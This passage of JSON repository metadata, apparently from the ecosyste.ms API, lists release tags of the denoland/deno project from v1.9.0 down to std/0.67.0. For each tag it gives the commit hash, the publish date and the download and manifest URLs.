no/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.